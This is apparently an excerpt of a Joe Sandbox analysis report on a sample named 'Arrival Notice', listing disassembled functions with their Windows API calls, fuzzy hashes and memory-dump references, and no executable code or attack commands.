Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94

Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004478E2
TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
GetCursorPos.USER32(00000000), ref: 0044796A
TrackPopupMenuEx.USER32(02FA6360,00000000,00000000,?,?,00000000), ref: 00447991

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CursorMenuPopupTrack$Proc
String ID:
API String ID: 1300944170-0
Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8

Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 004479CC
GetCursorPos.USER32(?), ref: 004479D7
ScreenToClient.USER32(?,?), ref: 004479F3
WindowFromPoint.USER32(?,?), ref: 00447A34
DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Client$CursorFromPointProcRectScreenWindow
String ID:
API String ID: 1822080540-0
Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6

Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00447C5D
ScreenToClient.USER32(?,?), ref: 00447C7B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
EndPaint.USER32(?,?), ref: 00447D13

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ClientPaintRectRectangleScreenViewportWindow
String ID:
API String ID: 659298297-0
Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69

Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

EnableWindow.USER32(?,00000000), ref: 00448B5C
EnableWindow.USER32(?,00000001), ref: 00448B72
ShowWindow.USER32(?,00000000), ref: 00448BE8
ShowWindow.USER32(?,00000004), ref: 00448BF4
EnableWindow.USER32(?,00000001), ref: 00448C09

Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
Part of subcall function 00440D98: SendMessageW.USER32(02FA1C60,000000F1,00000000,00000000), ref: 00440E6E
Part of subcall function 00440D98: SendMessageW.USER32(02FA1C60,000000F1,00000001,00000000), ref: 00440E9A

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$EnableMessageSend$LongShow
String ID:
API String ID: 142311417-0
Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A

Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69

Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00445879
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
_wcslen.LIBCMT ref: 004458FB
CharUpperBuffW.USER32(00000000,00000000), ref: 00445905

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
String ID:
API String ID: 3087257052-0
Opcode ID: bbe137feb6b63bbf11b605acf61b54fb28c264edd24c8eb0931df9f2f28af623
Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
Opcode Fuzzy Hash: bbe137feb6b63bbf11b605acf61b54fb28c264edd24c8eb0931df9f2f28af623
Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9

Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249

socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
WSAGetLastError.WSOCK32(00000000), ref: 0046540D
connect.WSOCK32(00000000,?,00000010), ref: 00465446
WSAGetLastError.WSOCK32(00000000), ref: 0046546D
closesocket.WSOCK32(00000000,00000000), ref: 00465481

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorLast$closesocketconnectinet_addrsocket
String ID:
API String ID: 245547762-0
Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99

Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004471D8
ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
SelectObject.GDI32(?,00000000), ref: 00447228
BeginPath.GDI32(?), ref: 0044723D
SelectObject.GDI32(?,00000000), ref: 00447266

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Object$Select$BeginCreateDeletePath
String ID:
API String ID: 2338827641-0
Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD

Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00434598
QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
Sleep.KERNEL32(00000000), ref: 004345D4
QueryPerformanceCounter.KERNEL32(?), ref: 004345DE

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9

Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00460C17
GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
MessageBeep.USER32(00000000), ref: 00460C46
KillTimer.USER32(?,0000040A), ref: 00460C68
EndDialog.USER32(?,00000001), ref: 00460C83

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95

Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 00455728
DeleteObject.GDI32(?), ref: 00455736
DeleteObject.GDI32(?), ref: 00455744
DestroyIcon.USER32(?), ref: 00455752
DestroyWindow.USER32(?), ref: 00455760

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Destroy$DeleteObjectWindow$Icon
String ID:
API String ID: 4023252218-0
Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9

Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
DeleteObject.GDI32(?), ref: 00455736
DeleteObject.GDI32(?), ref: 00455744
DestroyIcon.USER32(?), ref: 00455752
DestroyWindow.USER32(?), ref: 00455760

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: DeleteDestroyObject$IconMessageSendWindow
String ID:
API String ID: 1489400265-0
Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68

Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091

DestroyWindow.USER32(?), ref: 00455728
DeleteObject.GDI32(?), ref: 00455736
DeleteObject.GDI32(?), ref: 00455744
DestroyIcon.USER32(?), ref: 00455752
DestroyWindow.USER32(?), ref: 00455760

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
String ID:
API String ID: 1042038666-0
Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69

Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041780F

Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79

__getptd.LIBCMT ref: 00417826
__amsg_exit.LIBCMT ref: 00417834
__lock.LIBCMT ref: 00417844
__updatetlocinfoEx_nolock.LIBCMT ref: 00417858

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D

Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON

Download Yara Rule

APIs

Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC

___set_flsgetvalue.LIBCMT ref: 00413D20

Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8

___fls_getvalue@4.LIBCMT ref: 00413D2B

Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C

___fls_setvalue@8.LIBCMT ref: 00413D3E
GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
ExitThread.KERNEL32 ref: 00413D4E
GetCurrentThreadId.KERNEL32 ref: 00413D54
__freefls@4.LIBCMT ref: 00413D74

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 2403457894-0
Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE

Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON

Download Yara Rule

APIs

Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC

___set_flsgetvalue.LIBCMT ref: 004151C0

Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8

___fls_getvalue@4.LIBCMT ref: 004151CB

Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C

___fls_setvalue@8.LIBCMT ref: 004151DD
GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
ExitThread.KERNEL32 ref: 004151ED
__freefls@4.LIBCMT ref: 00415209

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
